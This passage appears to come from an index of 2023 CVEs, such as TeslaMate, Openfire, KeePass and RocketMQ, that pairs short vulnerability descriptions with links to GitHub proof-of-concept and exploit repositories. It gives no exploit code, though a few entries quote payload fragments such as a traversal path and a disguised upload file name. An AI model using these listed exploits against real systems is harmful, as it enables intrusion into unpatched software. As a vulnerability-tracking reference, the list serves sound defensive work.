The parameters nutzer_titel, nutzer_vn, and nutzer_nn in the user profile, and langID and ONLINEID in direct links, in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 do not validate input, which allows authenticated attackers to inject HTML Code and XSS payloads in multiple locations.

- [trustcves/CVE-2023-31434](https://github.com/trustcves/CVE-2023-31434)

### CVE-2023-31435 (2023-05-02)

Multiple components (such as Onlinetemplate-Verwaltung, Liste aller Teilbereiche, Umfragen anzeigen, and questionnaire previews) in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allow authenticated attackers to read and write to unauthorized data by accessing functions directly.

- [trustcves/CVE-2023-31435](https://github.com/trustcves/CVE-2023-31435)

### CVE-2023-31443
- [MaherAzzouzi/CVE-2023-31443](https://github.com/MaherAzzouzi/CVE-2023-31443)

### CVE-2023-31445 (2023-05-11)

Cassia Access Controller before 2.1.1.2203171453 was discovered to have an unprivileged information disclosure vulnerability that allows read-only users to enumerate all other users and discover the e-mail addresses, phone numbers, and privileges of all other users.

- [Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure](https://github.com/Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure)

### CVE-2023-31446 (2024-01-10)

In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.

- [Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution](https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution)

### CVE-2023-31497 (2023-05-11)

Incorrect access control in Quick Heal Technologies Limited Seqrite Endpoint Security (EPS) all versions prior to v8.0 allows attackers to escalate privileges to root via supplying a crafted binary to the target system.

- [0xInfection/EPScalate](https://github.com/0xInfection/EPScalate)

### CVE-2023-31541 (2023-06-13)

An unrestricted file upload vulnerability was discovered in the ‘Browse and upload images’ feature of the CKEditor v1.2.3 plugin for Redmine, which allows arbitrary files to be uploaded to the server.

- [DreamD2v/CVE-2023-31541](https://github.com/DreamD2v/CVE-2023-31541)

### CVE-2023-31546 (2023-12-14)

Cross Site Scripting (XSS) vulnerability in DedeBIZ v6.0.3 allows attackers to run arbitrary code via the search feature.

- [ran9ege/CVE-2023-31546](https://github.com/ran9ege/CVE-2023-31546)

### CVE-2023-31584 (2023-05-22)

GitHub repository cu/silicon commit a9ef36 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the User Input field.

- [rootd4ddy/CVE-2023-31584](https://github.com/rootd4ddy/CVE-2023-31584)

### CVE-2023-31594 (2023-05-25)

IC Realtime ICIP-P2012T 2.420 is vulnerable to Incorrect Access Control via an exposed HTTP channel using VLC network.

- [Yozarseef95/CVE-2023-31594](https://github.com/Yozarseef95/CVE-2023-31594)

### CVE-2023-31595 (2023-05-24)

IC Realtime ICIP-P2012T 2.420 is vulnerable to Incorrect Access Control via unauthenticated port access.

- [Yozarseef95/CVE-2023-31595](https://github.com/Yozarseef95/CVE-2023-31595)

### CVE-2023-31606 (2023-06-06)

A Regular Expression Denial of Service (ReDoS) issue was discovered in the sanitize_html function of redcloth gem v4.0.0. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.

- [merbinr/CVE-2023-31606](https://github.com/merbinr/CVE-2023-31606)

### CVE-2023-31634 (2024-03-27)

In TeslaMate before 1.27.2, there is unauthorized access to port 4000 for remote viewing and operation of user data. After accessing the IP address for the TeslaMate instance, an attacker can switch the port to 3000 to enter Grafana for remote operations. At that time, the default username and password can be used to enter the Grafana management console without logging in, a related issue to CVE-2022-23126.

- [iSee857/CVE-2023-31634](https://github.com/iSee857/CVE-2023-31634)

### CVE-2023-31664 (2023-05-23)

A reflected cross-site scripting (XSS) vulnerability in /authenticationendpoint/login.do of WSO2 API Manager before 4.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tenantDomain parameter.

- [adilkhan7/CVE-2023-31664](https://github.com/adilkhan7/CVE-2023-31664)

### CVE-2023-31702 (2023-05-17)

SQL injection in the View User Profile in MicroWorld eScan Management Console 14.0.1400.2281 allows a remote attacker to dump the entire database and gain a Windows XP command shell to perform code execution on the database server via GetUserCurrentPwd?UsrId=1.

- [sahiloj/CVE-2023-31702](https://github.com/sahiloj/CVE-2023-31702)

### CVE-2023-31703 (2023-05-17)

Cross Site Scripting (XSS) in the edit user form in Microworld Technologies eScan management console 14.0.1400.2281 allows a remote attacker to inject arbitrary code via the from parameter.

- [sahiloj/CVE-2023-31703](https://github.com/sahiloj/CVE-2023-31703)

### CVE-2023-31704 (2023-07-13)

Sourcecodester Online Computer and Laptop Store 1.0 is vulnerable to Incorrect Access Control, which allows remote attackers to elevate privileges to the administrator's role.

- [d34dun1c02n/CVE-2023-31704](https://github.com/d34dun1c02n/CVE-2023-31704)

### CVE-2023-31705 (2023-07-13)

A Reflected Cross-site scripting (XSS) vulnerability in Sourcecodester Task Reminder System 1.0 allows an authenticated user to inject malicious javascript into the page parameter.

- [d34dun1c02n/CVE-2023-31705](https://github.com/d34dun1c02n/CVE-2023-31705)

### CVE-2023-31711
- [HritikThapa7/CVE-2023-31711](https://github.com/HritikThapa7/CVE-2023-31711)

### CVE-2023-31714 (2023-08-30)

Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities.

- [msd0pe-1/CVE-2023-31714](https://github.com/msd0pe-1/CVE-2023-31714)

### CVE-2023-31716 (2023-09-21)

FUXA <= 1.1.12 has a Local File Inclusion vulnerability via file=fuxa.log.

- [MateusTesser/CVE-2023-31716](https://github.com/MateusTesser/CVE-2023-31716)

### CVE-2023-31717 (2023-09-21)

A SQL Injection attack in FUXA <= 1.1.12 allows exfiltration of confidential information from the database.

- [MateusTesser/CVE-2023-31717](https://github.com/MateusTesser/CVE-2023-31717)

### CVE-2023-31718 (2023-09-21)

FUXA <= 1.1.12 is vulnerable to Local File Inclusion via /api/download.

- [MateusTesser/CVE-2023-31718](https://github.com/MateusTesser/CVE-2023-31718)

### CVE-2023-31719 (2023-09-21)

FUXA <= 1.1.12 is vulnerable to SQL Injection via /api/signin.

- [MateusTesser/CVE-2023-31719](https://github.com/MateusTesser/CVE-2023-31719)

### CVE-2023-31726 (2023-05-23)

AList 3.15.1 is vulnerable to Incorrect Access Control, which can be exploited by attackers to obtain sensitive information.

- [J6451/CVE-2023-31726](https://github.com/J6451/CVE-2023-31726)

### CVE-2023-31747 (2023-05-23)

Wondershare Filmora 12 (Build 12.2.1.2088) was discovered to contain an unquoted service path vulnerability via the component NativePushService. This vulnerability allows attackers to launch processes with elevated privileges.

- [msd0pe-1/CVE-2023-31747](https://github.com/msd0pe-1/CVE-2023-31747)

### CVE-2023-31753 (2023-07-20)

SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter.

- [khmk2k/CVE-2023-31753](https://github.com/khmk2k/CVE-2023-31753)

### CVE-2023-31756 (2023-05-19)

A command injection vulnerability exists in the administrative web portal in TP-Link Archer VR1600V devices running firmware Versions <= 0.1.0. 0.9.1 v5006.0 Build 220518 Rel.32480n, which allows remote attackers, authenticated to the administrative web portal as an administrator user, to open an operating system level shell via the 'X_TP_IfName' parameter.

- [StanleyJobsonAU/LongBow](https://github.com/StanleyJobsonAU/LongBow)

### CVE-2023-31779 (2023-05-22)

Wekan v6.84 and earlier is vulnerable to Cross Site Scripting (XSS). An attacker with user privilege on a kanban board can insert JavaScript code in the "Reaction to comment" feature.

- [jet-pentest/CVE-2023-31779](https://github.com/jet-pentest/CVE-2023-31779)

### CVE-2023-31851 (2023-07-17)

Cudy LT400 1.13.4 has a cross-site scripting (XSS) vulnerability in /cgi-bin/luci/admin/network/wireless/status via the iface parameter.

- [CalfCrusher/CVE-2023-31851](https://github.com/CalfCrusher/CVE-2023-31851)

### CVE-2023-31852 (2023-07-17)

Cudy LT400 1.13.4 is vulnerable to Cross Site Scripting (XSS) in cgi-bin/luci/admin/network/wireless/config via the iface parameter.

- [CalfCrusher/CVE-2023-31852](https://github.com/CalfCrusher/CVE-2023-31852)

### CVE-2023-31853 (2023-07-17)

Cudy LT400 1.13.4 is vulnerable to Cross Site Scripting (XSS) in /cgi-bin/luci/admin/network/bandwidth via the icon parameter.

- [CalfCrusher/CVE-2023-31853](https://github.com/CalfCrusher/CVE-2023-31853)

### CVE-2023-32031 (2023-06-14)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [Avento/CVE-2023-32031](https://github.com/Avento/CVE-2023-32031)

### CVE-2023-32073 (2023-05-12)

WWBN AVideo is an open source video platform. In versions 12.4 and prior, a command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you use the CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854, which affects WWBN AVideo up to version 12.3. This issue is patched in commit 1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3.

- [jmrcsnchz/CVE-2023-32073](https://github.com/jmrcsnchz/CVE-2023-32073)

### CVE-2023-32117
- [RandomRobbieBF/CVE-2023-32117](https://github.com/RandomRobbieBF/CVE-2023-32117)

### CVE-2023-32162 (2023-09-06)

Wacom Drivers for Windows Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Wacom Drivers for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the handling of the WacomInstallI.txt file by the PrefUtil.exe utility. The issue results from incorrect permissions on the WacomInstallI.txt file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-16318.

- [LucaBarile/ZDI-CAN-16318](https://github.com/LucaBarile/ZDI-CAN-16318)

### CVE-2023-32163 (2023-09-06)

Wacom Drivers for Windows Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Wacom Drivers for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the Tablet Service. By creating a symbolic link, an attacker can abuse the service to create a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-16857.

- [LucaBarile/ZDI-CAN-16857](https://github.com/LucaBarile/ZDI-CAN-16857)

### CVE-2023-32233 (2023-05-08)

In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled.

- [PIDAN-HEIDASHUAI/CVE-2023-32233](https://github.com/PIDAN-HEIDASHUAI/CVE-2023-32233)
- [Liuk3r/CVE-2023-32233](https://github.com/Liuk3r/CVE-2023-32233)
- [oferchen/POC-CVE-2023-32233](https://github.com/oferchen/POC-CVE-2023-32233)
- [RogelioPumajulca/TEST-CVE-2023-32233](https://github.com/RogelioPumajulca/TEST-CVE-2023-32233)
- [void0red/CVE-2023-32233](https://github.com/void0red/CVE-2023-32233)

### CVE-2023-32235 (2023-05-05)

Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.

- [AXRoux/Ghost-Path-Traversal-CVE-2023-32235-](https://github.com/AXRoux/Ghost-Path-Traversal-CVE-2023-32235-)

### CVE-2023-32243 (2023-05-12)

Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.

- [little44n1o/cve-2023-32243](https://github.com/little44n1o/cve-2023-32243)
- [gbrsh/CVE-2023-32243](https://github.com/gbrsh/CVE-2023-32243)
- [RandomRobbieBF/CVE-2023-32243](https://github.com/RandomRobbieBF/CVE-2023-32243)
- [manavvedawala2/CVE-2023-32243-POC](https://github.com/manavvedawala2/CVE-2023-32243-POC)
- [manavvedawala2/CVE-2023-32243-proof-of-concept](https://github.com/manavvedawala2/CVE-2023-32243-proof-of-concept)
- [YouGina/CVE-2023-32243](https://github.com/YouGina/CVE-2023-32243)
- [thatonesecguy/Wordpress-Vulnerability-Identification-Scripts](https://github.com/thatonesecguy/Wordpress-Vulnerability-Identification-Scripts)
- [manavvedawala/CVE-2023-32243-proof-of-concept](https://github.com/manavvedawala/CVE-2023-32243-proof-of-concept)
- [Jenderal92/WP-CVE-2023-32243](https://github.com/Jenderal92/WP-CVE-2023-32243)
- [shaoyu521/Mass-CVE-2023-32243](https://github.com/shaoyu521/Mass-CVE-2023-32243)

### CVE-2023-32314 (2023-05-15)

vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.

- [AdarkSt/Honeypot_Smart_Infrastructure](https://github.com/AdarkSt/Honeypot_Smart_Infrastructure)

### CVE-2023-32315 (2023-05-26)

Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice.

- [ohnonoyesyes/CVE-2023-32315](https://github.com/ohnonoyesyes/CVE-2023-32315)
- [tangxiaofeng7/CVE-2023-32315-Openfire-Bypass](https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass)
- [5rGJ5aCh5oCq5YW9/CVE-2023-32315exp](https://github.com/5rGJ5aCh5oCq5YW9/CVE-2023-32315exp)
- [miko550/CVE-2023-32315](https://github.com/miko550/CVE-2023-32315)
- [ThatNotEasy/CVE-2023-32315](https://github.com/ThatNotEasy/CVE-2023-32315)
- [izzz0/CVE-2023-32315-POC](https://github.com/izzz0/CVE-2023-32315-POC)
- [gibran-abdillah/CVE-2023-32315](https://github.com/gibran-abdillah/CVE-2023-32315)
- [CN016/Openfire-RCE-CVE-2023-32315-](https://github.com/CN016/Openfire-RCE-CVE-2023-32315-)
- [K3ysTr0K3R/CVE-2023-32315-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT)
- [bryanqb07/CVE-2023-32315](https://github.com/bryanqb07/CVE-2023-32315)

### CVE-2023-32353 (2023-06-23)

A logic issue was addressed with improved checks. This issue is fixed in iTunes 12.12.9 for Windows. An app may be able to elevate privileges.

- [86x/CVE-2023-32353-PoC](https://github.com/86x/CVE-2023-32353-PoC)

### CVE-2023-32364 (2023-07-27)

A logic issue was addressed with improved restrictions. This issue is fixed in macOS Ventura 13.5. A sandboxed process may be able to circumvent sandbox restrictions.

- [gergelykalman/CVE-2023-32364-macos-app-sandbox-escape](https://github.com/gergelykalman/CVE-2023-32364-macos-app-sandbox-escape)

### CVE-2023-32407 (2023-06-23)

A logic issue was addressed with improved state management. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Monterey 12.6.6, iOS 16.5 and iPadOS 16.5. An app may be able to bypass Privacy preferences.

- [gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal](https://github.com/gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal)

### CVE-2023-32422 (2023-06-23)

This issue was addressed by adding additional SQLite logging restrictions. This issue is fixed in iOS 16.5 and iPadOS 16.5, tvOS 16.5, macOS Ventura 13.4. An app may be able to bypass Privacy preferences.

- [gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite](https://github.com/gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite)

### CVE-2023-32560 (2023-08-10)

An attacker can send a specially crafted message to the Wavelink Avalanche Manager, which could result in service disruption or arbitrary code execution.

Thanks to a Researcher at Tenable for finding and reporting.

Fixed in version 6.4.1.

- [x0rb3l/CVE-2023-32560](https://github.com/x0rb3l/CVE-2023-32560)
- [idkwastaken/CVE-2023-32560](https://github.com/idkwastaken/CVE-2023-32560)

### CVE-2023-32571 (2023-06-22)

Dynamic Linq 1.0.7.10 through 1.2.25 before 1.3.0 allows attackers to execute arbitrary code and commands when untrusted input to methods including Where, Select, OrderBy is parsed.

- [Tris0n/CVE-2023-32571-POC](https://github.com/Tris0n/CVE-2023-32571-POC)
- [vert16x/CVE-2023-32571-POC](https://github.com/vert16x/CVE-2023-32571-POC)

### CVE-2023-32629 (2023-07-26)

Local privilege escalation vulnerability in Ubuntu kernels: overlayfs ovl_copy_up_meta_inode_data skips permission checks when calling ovl_do_setxattr on Ubuntu kernels.

- [kaotickj/Check-for-CVE-2023-32629-GameOver-lay](https://github.com/kaotickj/Check-for-CVE-2023-32629-GameOver-lay)
- [ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation](https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation)
- [k4but0/Ubuntu-LPE](https://github.com/k4but0/Ubuntu-LPE)
- [xS9NTX/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC](https://github.com/xS9NTX/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC)

### CVE-2023-32681 (2023-05-26)

Requests is an HTTP library. Since Requests 2.3.0, Requests has been leaking Proxy-Authorization headers to destination servers when redirected to an HTTPS endpoint. This is a product of how we use `rebuild_proxies` to reattach the `Proxy-Authorization` header to requests. For HTTP connections sent through the tunnel, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into the tunneled request. This results in Requests forwarding proxy credentials to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate sensitive information. This issue has been patched in version 2.31.0.

- [hardikmodha/POC-CVE-2023-32681](https://github.com/hardikmodha/POC-CVE-2023-32681)

### CVE-2023-32707 (2023-06-01)

In versions of Splunk Enterprise below 9.0.5, 8.2.11, and 8.1.14, and Splunk Cloud Platform below version 9.0.2303.100, a low-privileged user who holds a role that has the ‘edit_user’ capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests.

- [9xN/CVE-2023-32707](https://github.com/9xN/CVE-2023-32707)

### CVE-2023-32749 (2023-06-08)

Pydio Cells allows users by default to create so-called external users in order to share files with them. By modifying the HTTP request sent when creating such an external user, it is possible to assign the new user arbitrary roles. By assigning all roles to a newly created user, access to all cells and non-personal workspaces is granted.

- [xcr-19/CVE-2023-32749](https://github.com/xcr-19/CVE-2023-32749)

### CVE-2023-32784 (2023-05-15)

In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation.

- [vdohney/keepass-password-dumper](https://github.com/vdohney/keepass-password-dumper)
- [CTM1/CVE-2023-32784-keepass-linux](https://github.com/CTM1/CVE-2023-32784-keepass-linux)
- [und3sc0n0c1d0/BruteForce-to-KeePass](https://github.com/und3sc0n0c1d0/BruteForce-to-KeePass)
- [z-jxy/keepass_dump](https://github.com/z-jxy/keepass_dump)
- [LeDocteurDesBits/cve-2023-32784](https://github.com/LeDocteurDesBits/cve-2023-32784)
- [hau-zy/KeePass-dump-py](https://github.com/hau-zy/KeePass-dump-py)
- [dawnl3ss/CVE-2023-32784](https://github.com/dawnl3ss/CVE-2023-32784)
- [le01s/poc-CVE-2023-32784](https://github.com/le01s/poc-CVE-2023-32784)
- [mister-turtle/cve-2023-32784](https://github.com/mister-turtle/cve-2023-32784)
- [Cmadhushanka/CVE-2023-32784-Exploitation](https://github.com/Cmadhushanka/CVE-2023-32784-Exploitation)

### CVE-2023-32961 (2023-06-12)

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Katie Seaborn Zotpress plugin <= 7.3.3 versions.

- [LOURC0D3/CVE-2023-32961](https://github.com/LOURC0D3/CVE-2023-32961)

### CVE-2023-33105 (2024-03-04)

Transient DOS in WLAN Host and Firmware when large number of open authentication frames are sent with an invalid transaction sequence number.

- [D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware](https://github.com/D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware)

### CVE-2023-33242 (2023-08-09)

Crypto wallets implementing the Lindell17 TSS protocol might allow an attacker to extract the full ECDSA private key by exfiltrating a single bit in every signature attempt (256 in total) because of not adhering to the paper's security proof's assumption regarding handling aborts after a failed signature.

- [d0rb/CVE-2023-33242](https://github.com/d0rb/CVE-2023-33242)

### CVE-2023-33243 (2023-06-15)

RedTeam Pentesting discovered that the web interface of STARFACE as well as its REST API allows authentication using the SHA512 hash of the password instead of the cleartext password. While storing password hashes instead of cleartext passwords in an application's database generally has become best practice to protect users' passwords in case of a database compromise, this is rendered ineffective when allowing to authenticate using the password hash.

- [RedTeamPentesting/CVE-2023-33243](https://github.com/RedTeamPentesting/CVE-2023-33243)

### CVE-2023-33246 (2023-05-24)

For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution.

Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification; an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system user that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.

To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for RocketMQ 5.x, or 4.9.6 or above for RocketMQ 4.x.

- [I5N0rth/CVE-2023-33246](https://github.com/I5N0rth/CVE-2023-33246)
- [4mazing/CVE-2023-33246-Copy](https://github.com/4mazing/CVE-2023-33246-Copy)
- [Le1a/CVE-2023-33246](https://github.com/Le1a/CVE-2023-33246)
- [SuperZero/CVE-2023-33246](https://github.com/SuperZero/CVE-2023-33246)
- [Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT)
- [3yujw7njai/CVE-2023-33246](https://github.com/3yujw7njai/CVE-2023-33246)
- [Devil0ll/CVE-2023-33246](https://github.com/Devil0ll/CVE-2023-33246)
- [d0rb/CVE-2023-33246](https://github.com/d0rb/CVE-2023-33246)
- [vulncheck-oss/fetch-broker-conf](https://github.com/vulncheck-oss/fetch-broker-conf)
- [0xKayala/CVE-2023-33246](https://github.com/0xKayala/CVE-2023-33246)
- [MkJos/CVE-2023-33246_RocketMQ_RCE_EXP](https://github.com/MkJos/CVE-2023-33246_RocketMQ_RCE_EXP)
- [hanch7274/CVE-2023-33246](https://github.com/hanch7274/CVE-2023-33246)
- [PavilionQ/CVE-2023-33246-mitigation](https://github.com/PavilionQ/CVE-2023-33246-mitigation)

### CVE-2023-33253 (2023-06-12)

LabCollector 6.0 through 6.15 allows remote code execution. An authenticated remote low-privileged user can upload an executable PHP file and execute system commands. The vulnerability is in the message function, and is due to insufficient validation of the file (such as shell.jpg.php.shell) being sent.

- [Toxich4/CVE-2023-33253](https://github.com/Toxich4/CVE-2023-33253)

### CVE-2023-33264 (2023-05-22)

In Hazelcast through 5.0.4, 5.1 through 5.1.6, and 5.2 through 5.2.3, configuration routines don't mask passwords in the member configuration properly. This allows Hazelcast Management Center users to view some of the secrets.

- [miguelc49/CVE-2023-33264-2](https://github.com/miguelc49/CVE-2023-33264-2)
- [miguelc49/CVE-2023-33264-1](https://github.com/miguelc49/CVE-2023-33264-1)
- [miguelc49/CVE-2023-33264-3](https://github.com/miguelc49/CVE-2023-33264-3)

### CVE-2023-33381 (2023-06-06)

A command injection vulnerability was found in the ping functionality of the MitraStar GPT-2741GNAC router (firmware version AR_g5.8_110WVN0b7_2). The vulnerability allows an authenticated user to execute arbitrary OS commands by sending specially crafted input to the router via the ping function.

- [duality084/CVE-2023-33381-MitraStar-GPT-2741GNAC](https://github.com/duality084/CVE-2023-33381-MitraStar-GPT-2741GNAC)

### CVE-2023-33404 (2023-06-26)

An Unrestricted Upload vulnerability, due to insufficient validation on UploadControlled.cs file, in BlogEngine.Net version 3.3.8.0 and earlier allows remote attackers to execute remote code.

- [hacip/CVE-2023-33404](https://github.com/hacip/CVE-2023-33404)

### CVE-2023-33405 (2023-06-21)

Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect.

- [hacip/CVE-2023-33405](https://github.com/hacip/CVE-2023-33405)

### CVE-2023-33408 (2023-06-05)

Minical 1.0.0 is vulnerable to Cross Site Scripting (XSS). The vulnerability exists due to insufficient input validation in the application's user input handling in the security_helper.php file.

- [Thirukrishnan/CVE-2023-33408](https://github.com/Thirukrishnan/CVE-2023-33408)

### CVE-2023-33409 (2023-06-05)

Minical 1.0.0 is vulnerable to Cross Site Request Forgery (CSRF) via minical/public/application/controllers/settings/company.php.

- [Thirukrishnan/CVE-2023-33409](https://github.com/Thirukrishnan/CVE-2023-33409)

### CVE-2023-33410 (2023-06-05)

Minical 1.0.0 and earlier contains a CSV injection vulnerability which allows an attacker to execute remote code. The vulnerability exists due to insufficient input validation on the Customer Name field in the Accounting module that is used to construct a CSV file.

- [Thirukrishnan/CVE-2023-33410](https://github.com/Thirukrishnan/CVE-2023-33410)

### CVE-2023-33476 (2023-06-02)

ReadyMedia (MiniDLNA) versions from 1.1.15 up to 1.3.2 are vulnerable to Buffer Overflow. The vulnerability is caused by incorrect validation logic when handling HTTP requests using chunked transport encoding. This results in other code later using attacker-controlled chunk values that exceed the length of the allocated buffer, resulting in out-of-bounds read/write.

- [mellow-hype/cve-2023-33476](https://github.com/mellow-hype/cve-2023-33476)

### CVE-2023-33477 (2023-06-06)

In Harmonic NSG 9000-6G devices, an authenticated remote user can obtain source code by directly requesting a special path.

- [Skr11lex/CVE-2023-33477](https://github.com/Skr11lex/CVE-2023-33477)

### CVE-2023-33517 (2023-10-23)

carRental 1.0 is vulnerable to Incorrect Access Control (Arbitrary File Read on the Back-end System).

- [wushigudan/CVE-2023-33517](https://github.com/wushigudan/CVE-2023-33517)

### CVE-2023-33580 (2023-06-26)

Phpgurukul Student Study Center Management System V1.0 is vulnerable to Cross Site Scripting (XSS) in the "Admin Name" field on Admin Profile page.

- [sudovivek/My-CVE](https://github.com/sudovivek/My-CVE)

### CVE-2023-33592 (2023-06-28)

Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.

- [ChineseOldboy/CVE-2023-33592](https://github.com/ChineseOldboy/CVE-2023-33592)

### CVE-2023-33617 (2023-05-23)

An OS Command Injection vulnerability in Parks Fiberlink 210 firmware version V2.1.14_X000 was found via the /boaform/admin/formPing target_addr parameter.

- [Chocapikk/CVE-2023-33617](https://github.com/Chocapikk/CVE-2023-33617)
- [tucommenceapousser/CVE-2023-33617](https://github.com/tucommenceapousser/CVE-2023-33617)

### CVE-2023-33668 (2023-07-12)

DigiExam up to v14.0.2 lacks integrity checks for native modules, allowing attackers to access PII and takeover accounts on shared computers.

- [lodi-g/CVE-2023-33668](https://github.com/lodi-g/CVE-2023-33668)

### CVE-2023-33669 (2023-06-02)

Tenda AC8V4.0-V16.03.34.06 was discovered to contain a stack overflow via the timeZone parameter in the sub_44db3c function.

- [retr0reg/tenda-ac8v4-rop](https://github.com/retr0reg/tenda-ac8v4-rop)
- [Mohammaddvd/CVE-2023-33669](https://github.com/Mohammaddvd/CVE-2023-33669)

### CVE-2023-33730 (2023-05-31)

Privilege Escalation in the "GetUserCurrentPwd" function in Microworld Technologies eScan Management Console 14.0.1400.2281 allows any remote attacker to retrieve the password of any admin or normal user in plain text format.

- [sahiloj/CVE-2023-33730](https://github.com/sahiloj/CVE-2023-33730)

### CVE-2023-33731 (2023-06-02)

Reflected Cross Site Scripting (XSS) in the view dashboard detail feature in Microworld Technologies eScan management console 14.0.1400.2281 allows a remote attacker to inject arbitrary code via the URL directly.

- [sahiloj/CVE-2023-33731](https://github.com/sahiloj/CVE-2023-33731)

### CVE-2023-33732 (2023-05-31)

Cross Site Scripting (XSS) in the New Policy form in Microworld Technologies eScan management console 14.0.1400.2281 allows a remote attacker to inject arbitrary code via the vulnerable parameters type, txtPolicyType, and Deletefileval.

- [sahiloj/CVE-2023-33732](https://github.com/sahiloj/CVE-2023-33732)

### CVE-2023-33733 (2023-06-05)

Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.

- [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733)
- [hoangbui24/CVE-2023-33733](https://github.com/hoangbui24/CVE-2023-33733)
- [onion2203/Lab_Reportlab](https://github.com/onion2203/Lab_Reportlab)
- [buiduchoang24/CVE-2023-33733](https://github.com/buiduchoang24/CVE-2023-33733)
- [L41KAA/CVE-2023-33733-Exploit-PoC](https://github.com/L41KAA/CVE-2023-33733-Exploit-PoC)

### CVE-2023-33747 (2023-06-06)

CloudPanel v2.2.2 allows attackers to execute a path traversal.

- [0xWhoami35/CloudPanel-CVE-2023-33747](https://github.com/0xWhoami35/CloudPanel-CVE-2023-33747)

### CVE-2023-33768 (2023-07-13)

Incorrect signature verification of the firmware during the Device Firmware Update process of Belkin Wemo Smart Plug WSP080 v1.2 allows attackers to cause a Denial of Service (DoS) via a crafted firmware file.

